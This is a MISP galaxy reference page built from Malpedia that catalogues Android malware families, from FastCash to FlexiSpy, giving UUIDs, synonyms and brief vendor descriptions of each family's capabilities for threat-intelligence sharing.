Skip to content

Hide Navigation Hide TOC

Edit

Malpedia

Malware galaxy cluster based on Malpedia.

Authors
Authors and/or Contributors
Davide Arcuri
Alexandre Dulaunoy
Steffen Enders
Andrea Garavaglia
Andras Iklody
Daniel Plohmann
Christophe Vandeplas

FastCash

Internal MISP references

UUID e8a04177-6a91-46a6-9f63-6a9fac4dfa02 which can be used as unique global reference for FastCash in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

888 RAT

Internal MISP references

UUID e98ae895-0831-4e10-aad1-593d1c678db1 which can be used as unique global reference for 888 RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Aberebot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Aberebot.

Known Synonyms
Escobar
Internal MISP references

UUID 4b9c0228-2bfd-4bc7-bd64-8357a2da12ee which can be used as unique global reference for Aberebot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AbstractEmu

According to PCrisk, AbstractEmu is the name of rooting malware that can gain privileged access to the Android operating system. Threat actors behind AbstractEmu are using legitimate-looking apps (like password managers, app launchers, data savers) to trick users into downloading and opening/executing this malware.

Internal MISP references

UUID 57a4c8c0-140a-45e3-9166-64e3e35c5986 which can be used as unique global reference for AbstractEmu in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ActionSpy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ActionSpy.

Known Synonyms
AxeSpy
Internal MISP references

UUID 5c7a35bf-e5f1-4b07-b93a-c3608cc9142e which can be used as unique global reference for ActionSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AdoBot

Internal MISP references

UUID d95708e9-220a-428c-b126-a63986099892 which can be used as unique global reference for AdoBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AdultSwine

Internal MISP references

UUID 824f284b-b38b-4a57-9e4a-aee4061a5b2d which can be used as unique global reference for AdultSwine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Agent Smith

Internal MISP references

UUID 34770e6e-e2c3-4e45-aa86-9d74b5309773 which can be used as unique global reference for Agent Smith in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AhMyth

According to PCrisk, Ahmyth is a Remote Access Trojan (RAT) targeting Android users. It is distributed via trojanized (fake) applications. Ahmyth RAT steals cryptocurrency and banking credentials, 2FA codes, lock screen passcodes, and captures screenshots.

Internal MISP references

UUID 86a5bb47-ac59-449a-8ff2-ae46e19cc6d2 which can be used as unique global reference for AhMyth in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Alien

According to ThreatFabric, this is a fork of Cerberus v1 (active January 2020+). Alien is a rented banking trojan that can remotely control a phone and achieves RAT functionality by abusing TeamViewer.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Alien.

Known Synonyms
AlienBot
Internal MISP references

UUID de483b10-4247-46b3-8ab5-77d089f0145c which can be used as unique global reference for Alien in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AmexTroll

Internal MISP references

UUID 6b153952-9415-4710-8175-354b59252dbc which can be used as unique global reference for AmexTroll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AmpleBot

This malware was initially named BlackRock and later renamed to AmpleBot.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AmpleBot.

Known Synonyms
BlackRock
Internal MISP references

UUID 2f3f82f6-ec21-489e-8257-0967c567798a which can be used as unique global reference for AmpleBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Anatsa

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anatsa.

Known Synonyms
ReBot
TeaBot
Toddler
Internal MISP references

UUID 147081b9-7e59-4613-ad55-bbc08141fee1 which can be used as unique global reference for Anatsa in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AndroRAT

Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.

Internal MISP references

UUID 80447111-8085-40a4-a052-420926091ac6 which can be used as unique global reference for AndroRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ANDROSNATCH

According to Google, a Chrome cookie stealer.

Internal MISP references

UUID 8cd795ed-3a4d-41a3-abb1-0c3dd3aa4eab which can be used as unique global reference for ANDROSNATCH in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Antidot

The malware displays fake Google Play update pages in multiple languages, including German, French, Spanish, Russian, Portuguese, Romanian, and English, indicating potential targets in these regions.

Antidot uses overlay attacks and keylogging techniques to efficiently collect sensitive information such as login credentials.

Internal MISP references

UUID c1f3e4c7-ab9d-4cde-b5df-cbd256c0bd8e which can be used as unique global reference for Antidot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Anubis (Android)

BleepingComputer found that Anubis will display fake phishing login forms when users open up apps for targeted platforms to steal credentials. This overlay screen will be shown over the real app's login screen to make victims think it's a legitimate login form when in reality, inputted credentials are sent to the attackers.

In the new version spotted by Lookout, Anubis now targets 394 apps and has the following capabilities:

Recording screen activity and sound from the microphone Implementing a SOCKS5 proxy for covert communication and package delivery Capturing screenshots Sending mass SMS messages from the device to specified recipients Retrieving contacts stored on the device Sending, reading, deleting, and blocking notifications for SMS messages received by the device Scanning the device for files of interest to exfiltrate Locking the device screen and displaying a persistent ransom note Submitting USSD code requests to query bank balances Capturing GPS data and pedometer statistics Implementing a keylogger to steal credentials Monitoring active apps to mimic and perform overlay attacks Stopping malicious functionality and removing the malware from the device

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anubis (Android).

Known Synonyms
BankBot
android.bankbot
android.bankspy
Internal MISP references

UUID 85975621-5126-40cb-8083-55cbfa75121b which can be used as unique global reference for Anubis (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AnubisSpy

Internal MISP references

UUID 06ffb614-33ca-4b04-bf3b-623e68754184 which can be used as unique global reference for AnubisSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Asacub

Internal MISP references

UUID dffa06ec-e94f-4fd7-8578-2a98aace5473 which can be used as unique global reference for Asacub in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Ashas

Internal MISP references

UUID aabcfbb6-6385-486d-a30b-e3a2edcf493d which can be used as unique global reference for Ashas in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ATANK

According to Lukas Stefanko, this is an open-source crypto-ransomware found on Github in 2018. IT can en/decrypt files (AES, key: 32 random chars, sent to C&C), uses email as contact point but will remove all files after 24 hours or after a reboot.

Internal MISP references

UUID 231f9f49-6752-49af-9ee0-7774578fcbe4 which can be used as unique global reference for ATANK in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

AxBanker

According to EnigmaSoft, AxBanker is a banking Trojan targeting Android devices specifically. The threatening tool has been deployed as part of large attack campaigns against users in India. The threat actors use smishing (SMS phishing) techniques to smuggle the malware threat onto the victims' devices. The fake applications carrying AxBanker are designed to visually impersonate the official applications of popular Indian banking organizations. The weaponized applications use fake promises or rewards and discounts as additional lures.

Internal MISP references

UUID 4a854e8c-d6ad-4997-8931-b27e39b7f7fa which can be used as unique global reference for AxBanker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

badbazaar

BadBazaar is a type of malware primarily functioning as a spyware. Designed to compromise Android and iOS devices, it is often distributed through malicious apps downloaded from unofficial app stores, third-party websites, Telegram channels, and social engineering. Once installed, BadBazaar seeks to surveil the victim by intercepting SMS messages, performing screen recordings, and logging keystrokes on the device. Additionally, it can execute remote commands and download and install other malicious applications, further compromising the security of the affected device.

Internal MISP references

UUID 80b30290-40d3-4ce3-a878-2e0af4b107d8 which can be used as unique global reference for badbazaar in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BADBOX

According to BitSight, BADBOX is a large-scale cybercriminal operation selling off-brand Android TV boxes, smartphones, and other Android electronics with preinstalled malware.

Internal MISP references

UUID b7a96690-4547-43a2-98e9-91cc56affbe4 which can be used as unique global reference for BADBOX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BADCALL (Android)

remote access tool (RAT) payload on Android devices

Internal MISP references

UUID 5eec00de-5d81-4907-817d-f99cb33d9b66 which can be used as unique global reference for BADCALL (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BadPatch

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BadPatch.

Known Synonyms
WelcomeChat
Internal MISP references

UUID 9b96e274-1602-48a4-8e0d-9f756d4e835b which can be used as unique global reference for BadPatch in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Bahamut (Android)

According to PCrisk, Bahamut is the name of Android malware with spyware functionality. Threat actors use Bahamut to steal sensitive information. The newest malware version targets various messaging apps and personally identifiable information.

Internal MISP references

UUID 4038c3bc-b559-45bb-bac1-9665a54dedf9 which can be used as unique global reference for Bahamut (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Basbanke

Internal MISP references

UUID c59b65d6-d363-4b19-b082-d72508e782c0 which can be used as unique global reference for Basbanke in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BianLian (Android)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BianLian (Android).

Known Synonyms
Hydra
Internal MISP references

UUID 1faaa5c5-ab4e-4101-b2d9-0e12207d70fc which can be used as unique global reference for BianLian (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BingoMod

Internal MISP references

UUID 2778f61a-48e4-4585-8eff-983d5a4fd6ac which can be used as unique global reference for BingoMod in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BlankBot

Internal MISP references

UUID c4a42580-bc5e-4185-adfd-cc6ade9b8424 which can be used as unique global reference for BlankBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BoneSpy

According to Lookout, BoneSpy is based on the Russian-developed, open-source DroidWatcher surveillanceware, featuring nearly identical code, names, and log messages in multiple classes related to the handling of databases containing collected exfil data such as call logs, location tracking, SMS messages, notifications, and browser bookmarks. Class names for many entry points (receivers, activities, and services) were either the same or very similar to DroidWatcher samples.

Internal MISP references

UUID 54723362-0b25-4e84-b5ff-5e50083b0b52 which can be used as unique global reference for BoneSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BrasDex

According to PCrisk, BraDex is a banking malware targeting Android operating systems. This malicious program aims to gain access to victims' bank accounts and make fraudulent transactions.

At the time of writing, BrasDex targets Brazilian banking applications exclusively. In previous BrasDex campaigns, it infiltrated devices under the guise of Android system related apps. Lately, this malware has been installed by a fake Brazilian Banco Santander banking application.

Internal MISP references

UUID dc5408e9-e9e8-44fd-ac5c-231483d0ebe3 which can be used as unique global reference for BrasDex in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BRATA

According to Cleafy, the victim's Android device is factory reset after the attackers siphon money from the victim's bank account. This distracts users from the crime, while removing traces or footprints that might be of interest to forensic analysts.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRATA.

Known Synonyms
AmexTroll
Copybara
Internal MISP references

UUID d9ff080d-cde0-48da-89db-53435c99446b which can be used as unique global reference for BRATA in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Brunhilda

PRODAFT describes Brunhilda as a "Dropper as a Service" for Google Play, delivering e.g. Alien.

Internal MISP references

UUID 5d3d5f52-0a55-4c81-af87-7809ce43906b which can be used as unique global reference for Brunhilda in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BTMOB RAT

According to Cyble, this is an advanced Android malware evolved from SpySolr that features remote control, credential theft, and data exfiltration. It spreads via phishing sites impersonating streaming services like iNat TV and fake mining platforms. The malware abuses Android’s Accessibility Service to unlock devices, log keystrokes, and automate credential theft through injections. It uses WebSocket-based C&C communication for real-time command execution and data theft. BTMOB RAT supports various malicious actions, including live screen sharing, file management, audio recording, and web injections.

Internal MISP references

UUID 3d244016-fa66-45ac-8f96-7ae7d158e931 which can be used as unique global reference for BTMOB RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BusyGasper

Internal MISP references

UUID 4bf68bf8-08e5-46f3-ade5-0bd4f124b168 which can be used as unique global reference for BusyGasper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CapraRAT

According to PCrisk, CapraRAT is the name of an Android remote access trojan (RAT), possibly a modified version of another (open-source) RAT called AndroRAT. It is known that CapraRAT is used by an advanced persistent threat group (ATP) called APT36 (also known as Earth Karkaddan). CapraRAT allows attackers to perform certain actions on the infected Android device.

Internal MISP references

UUID 7cd1c5f3-7635-46d2-87f1-e638fb8d714c which can be used as unique global reference for CapraRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CarbonSteal

Internal MISP references

UUID 56090c0b-2b9b-4624-8eff-ef6d3632fd2b which can be used as unique global reference for CarbonSteal in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Catelites

Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim. The distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered. Currently the malware has overlays for over 2,200 apps of banks and financial institutions.

Internal MISP references

UUID 2c672b27-bc65-48ba-ba3d-6318473e78b6 which can be used as unique global reference for Catelites in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Cerberus

According to PCrisk, Cerberus is an Android banking Trojan which can be rented on hacker forums. It was been created in 2019 and is used to steal sensitive, confidential information. Cerberus can also be used to send commands to users' devices and perform dangerous actions.

Internal MISP references

UUID c3a2448f-bb41-4201-b524-3ddcb02ddbf4 which can be used as unique global reference for Cerberus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Chameleon

The malware chamaleon is an Android trojan that pretends to be legitimate entities to steal data from users in Australia and Poland. It exploits the Accessibility Service to monitor and modify the device screen.

Internal MISP references

UUID 90b3a256-311d-416b-b333-e02b910ba75d which can be used as unique global reference for Chameleon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Chamois

Internal MISP references

UUID 2e230ff8-3971-4168-a966-176316cbdbf2 which can be used as unique global reference for Chamois in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Charger

Internal MISP references

UUID 6e0545df-8df6-4990-971c-e96c4c60d561 which can be used as unique global reference for Charger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Chinotto (Android)

Internal MISP references

UUID 6cc7b402-21cf-4510-be7d-d7f811a57bc1 which can be used as unique global reference for Chinotto (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Chrysaor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chrysaor.

Known Synonyms
JigglyPuff
Pegasus
Internal MISP references

UUID 52acea22-7d88-433c-99e6-8fef1657e3ad which can be used as unique global reference for Chrysaor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Clientor

Internal MISP references

UUID c0a48ca3-682d-45bc-805c-e62aecd4c724 which can be used as unique global reference for Clientor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Clipper

Internal MISP references

UUID ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e which can be used as unique global reference for Clipper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CloudAtlas

Internal MISP references

UUID ed780667-b67c-4e17-ab43-db1b7e018e66 which can be used as unique global reference for CloudAtlas in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CometBot

Internal MISP references

UUID 151bf399-aa8f-4160-b9b5-8fe222f2a6b1 which can be used as unique global reference for CometBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Connic

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Connic.

Known Synonyms
SpyBanker
Internal MISP references

UUID 93b1c63a-4a34-44fd-805b-0a3470ff7e6a which can be used as unique global reference for Connic in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Coper

Coper is an Android banking trojan and RAT descended from ExobotCompact, itself a rewrite of Exobot. It uses a modular architecture, a multi-stage infection chain and (in some variants) a DGA. First observed in Colombia, it has since spread to Europe.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Coper.

Known Synonyms
ExobotCompact
Octo
Internal MISP references

UUID 70973ef7-e031-468f-9420-d8aa4eb7543a which can be used as unique global reference for Coper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Copybara

Internal MISP references

UUID e3d07fda-d29d-42e4-a0d6-5827b2d14d17 which can be used as unique global reference for Copybara in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Coronavirus Android Worm

Poses as an app that can offer a "corona safety mask" but phone's address book and sends sms to contacts, spreading its own download link.

Internal MISP references

UUID f041032e-01af-4e66-9fb2-f8da88a6ea35 which can be used as unique global reference for Coronavirus Android Worm in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Cpuminer (Android)

Internal MISP references

UUID 8a42a699-1746-498b-a558-e7113bb916c0 which can be used as unique global reference for Cpuminer (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CraxsRAT

Internal MISP references

UUID 1f7a8a57-f3e2-4e4b-a4d7-8eb0ba9243c5 which can be used as unique global reference for CraxsRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Crocodilus

According to ThreatFabric, this malware offers remote control, black screen overlays, and advanced data harvesting via accessibility logging.

Internal MISP references

UUID a2b69930-86ad-47ab-a8a1-1601f30b7f0d which can be used as unique global reference for Crocodilus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CryCryptor

According to NHS Digital, CryCryptor is distributed via websites that spoof health organisations. At the time of publication these websites have affected the Canadian health service. CryCryptor cannot be obtained from the Google Play store, so devices restricted to only running apps from the store are not affected.

When CryCryptor is run it encrypts common file types and saves a ransom note to every directory where files have been encrypted. Encrypted files have the extension '.enc' appended to the filenames. Additional files are saved containing the salt values used in each encryption and an initialisation vector. These files have the extensions '.enc.salt' and '.enc.iv' respectively.

When files have been encrypted, a notification is displayed directing users to open the ransom note.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CryCryptor.

Known Synonyms
CryCrypter
CryDroid
Internal MISP references

UUID 21e9d7e6-6e8c-49e4-8869-6bac249cda8a which can be used as unique global reference for CryCryptor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CyberAzov

Internal MISP references

UUID bb1821f9-eace-4e63-b55d-fc7821a6e5f1 which can be used as unique global reference for CyberAzov in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DAAM

According to PCrisk, DAAM is an Android malware utilized to gain unauthorized access to targeted devices since 2021. With the DAAM Android botnet, threat actors can bind harmful code with a genuine application using its APK binding service.

Lookout refers to this malware as BouldSpy and assesses with medium confidence that this Android surveillance tool is used by the Law Enforcement Command of the Islamic Republic of Iran (FARAJA).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DAAM.

Known Synonyms
BouldSpy
Internal MISP references

UUID 37a3b62e-99da-47d7-81fb-78f745427b16 which can be used as unique global reference for DAAM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dark Shades

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dark Shades.

Known Synonyms
Rogue
Internal MISP references

UUID 97fe35c9-f50c-495f-8736-0ecd95c70192 which can be used as unique global reference for Dark Shades in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DawDropper

Internal MISP references

UUID bd9756da-220d-48d6-a4f5-6646558c4b30 which can be used as unique global reference for DawDropper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DEFENSOR ID

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEFENSOR ID.

Known Synonyms
Defensor Digital
Internal MISP references

UUID 76346e4d-d14e-467b-9409-82b28a4d6cd6 which can be used as unique global reference for DEFENSOR ID in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dendroid

Internal MISP references

UUID 89989df2-e8bc-4074-a8a2-130a15d6625f which can be used as unique global reference for Dendroid in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DHCSpy

According to Lookout, DCHSpy is an Android surveillanceware tool leveraged by Iranian cyber espionage group MuddyWater. DCHSpy collects WhatsApp data, accounts, contacts, SMS, files, location, and call logs, and can record audio and take photos.

Internal MISP references

UUID d70da110-3e0d-475d-8dd2-d8614f07a3ae which can be used as unique global reference for DHCSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

dmsSpy

Internal MISP references

UUID 72a25832-4bf4-4505-a77d-8c0fc52dc85d which can be used as unique global reference for dmsSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DoubleAgent

Internal MISP references

UUID 73fd1bda-e4aa-4777-a628-07580bc070f4 which can be used as unique global reference for DoubleAgent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DoubleLocker

Internal MISP references

UUID 10d0115a-00b4-414e-972b-8320a2bb873c which can be used as unique global reference for DoubleLocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dracarys

Android malware that impersonates genuine applications such as Signal, Telegram, WhatsApp, YouTube, and other chat applications and distributes through phishing sites.

Internal MISP references

UUID bf94eee6-2274-40f4-b181-2b49ce6ef9fb which can be used as unique global reference for Dracarys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DragonEgg

Android variant of ios.LightSpy.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DragonEgg.

Known Synonyms
LightSpy
Internal MISP references

UUID 4ef28f14-17f4-4f87-a292-e63b42027c8c which can be used as unique global reference for DragonEgg in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DroidBot

According to Cleafy, DroidBot is a modern RAT that combines hidden VNC and overlay attack techniques with spyware-like capabilities, such as keylogging and user interface monitoring. Moreover, it leverages dual-channel communication, transmitting outbound data through MQTT and receiving inbound commands via HTTPS, providing enhanced operation flexibility and resilience.

Internal MISP references

UUID 1e0562cd-981a-4b81-b813-9a59fff6fb71 which can be used as unique global reference for DroidBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DroidJack

Internal MISP references

UUID 8990cec7-ddd8-435e-97d6-5b36778e86fe which can be used as unique global reference for DroidJack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DroidLock

According to Zimperium, DroidLock has the ability to lock device screens with a ransomware-like overlay and illegally acquire app lock credentials, leading to a total takeover of the compromised device.

It employs deceptive system update screens to trick victims and can stream and remotely control devices via VNC. The malware also exploits device administrator privileges to lock or erase data, capture the victim's image with the front camera, and silence the device. Overall, it utilizes 15 distinct commands to interact with its C2 panel.

Internal MISP references

UUID 2f3b54fe-6a17-4584-a6bb-ebcdb755624d which can be used as unique global reference for DroidLock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DroidWatcher

Internal MISP references

UUID 15f3e50b-9fa5-4eab-ac2b-928e9ce03b72 which can be used as unique global reference for DroidWatcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

DualToy (Android)

Internal MISP references

UUID 8269e779-db23-4c94-aafb-36ee94879417 which can be used as unique global reference for DualToy (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Dvmap

Internal MISP references

UUID e5de818e-d25d-47a8-ab31-55fc992bf91b which can be used as unique global reference for Dvmap in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

EagleMsgSpy

According to Lookout, EagleMsgSpy is a lawful intercept surveillance tool developed by a Chinese software development company with use by public security bureaus in mainland China. Early samples indicate the surveillance tool has been operational since at least 2017, with development continued into late 2024. EagleMsgSpy collects extensive data from the user: third-party chat messages, screen recording and screenshot capture, audio recordings, call logs, device contacts, SMS messages, location data, network activity. Through infrastructure overlap and artifacts from open command and control directories, Lookout attributes EagleMsgSpy to Wuhan Chinasoft Token Information Technology Co., Ltd. with high confidence.

Internal MISP references

UUID 1b53d17e-ab9c-4b9f-8c01-588bccac4dee which can be used as unique global reference for EagleMsgSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Elibomi

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Elibomi.

Known Synonyms
Drinik
Internal MISP references

UUID 63cc0b01-c92e-40e7-8669-48d10a490ffb which can be used as unique global reference for Elibomi in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ERMAC

According to Intel471, ERMAC, an Android banking trojan enables bad actors to determine when certain apps are launched and then overwrites the screen display to steal the user's credentials

Internal MISP references

UUID 602944f4-a86c-4a05-b98f-cfb525fb8896 which can be used as unique global reference for ERMAC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ErrorFather

ErrorFather is an Android banking trojan with a multi-stage dropper. The final payload is derived from the Cerberus source code leak.

Internal MISP references

UUID 2c7f6a97-4469-4f97-9a69-5549282a94a6 which can be used as unique global reference for ErrorFather in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Eventbot

According to ThreatFabric, the app overlays 15 financial targets from UK, Italy, and Spain, sniffs 234 apps from banks located in Europe as well as crypto wallets.

Internal MISP references

UUID 5a6fb8cd-d582-4c8c-b7e0-a5b4cf4f248f which can be used as unique global reference for Eventbot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ExoBot

Internal MISP references

UUID c9f2b058-6c22-462a-a20a-fca933a597dd which can be used as unique global reference for ExoBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Exodus

Internal MISP references

UUID 462bc006-b7bd-4e10-afdb-52baf86121e8 which can be used as unique global reference for Exodus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FaceStealer

Facebook Credential Stealer.

Internal MISP references

UUID c35ebd96-d2f8-4add-b86f-f552ed5dfa9b which can be used as unique global reference for FaceStealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FakeAdBlocker

Internal MISP references

UUID d0ae2b6b-5137-4b64-be3e-4bbc9aa007a6 which can be used as unique global reference for FakeAdBlocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Fakecalls

According to Kaspersky, Fakecalls is a Trojan that masquerades as a banking app and imitates phone conversations with bank employees.

Internal MISP references

UUID 014aeab6-2292-4ee5-83d6-fffb0fc21423 which can be used as unique global reference for Fakecalls in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FakeDefend

Internal MISP references

UUID 8ea1fc8c-ec66-4d39-b32a-da69d3277da4 which can be used as unique global reference for FakeDefend in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FakeSpy

Internal MISP references

UUID dd821edd-901b-4a5e-b35f-35bb811964ab which can be used as unique global reference for FakeSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FakeGram

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FakeGram.

Known Synonyms
FakeTGram
Internal MISP references

UUID 6c0fc7e4-4629-494f-b471-f7a8cc47c0e0 which can be used as unique global reference for FakeGram in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FastFire

Internal MISP references

UUID 5613da3a-06f5-4363-b468-0b8a03ffc292 which can be used as unique global reference for FastFire in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FastSpy

Internal MISP references

UUID a5e3e217-3790-4d7c-b67a-906b9ee69034 which can be used as unique global reference for FastSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FileCoder

According to heimdal, A new strain of ransomware emerged on Android mobile devices. It targets those who are running the operating system Android 5.1 and higher. This Android ransomware strain has been dubbed by security researchers FileCoder (Android/Filecoder.c) and it spreads via text messages containing a malicious link.

Internal MISP references

UUID 09ff3520-b643-44bd-a0de-90c0e75ba12f which can be used as unique global reference for FileCoder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FinFisher (Android)

Internal MISP references

UUID 0bf7acd4-6493-4126-9598-d2ed069e32eb which can be used as unique global reference for FinFisher (Android) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FlexiSpy (Android)

Internal MISP references

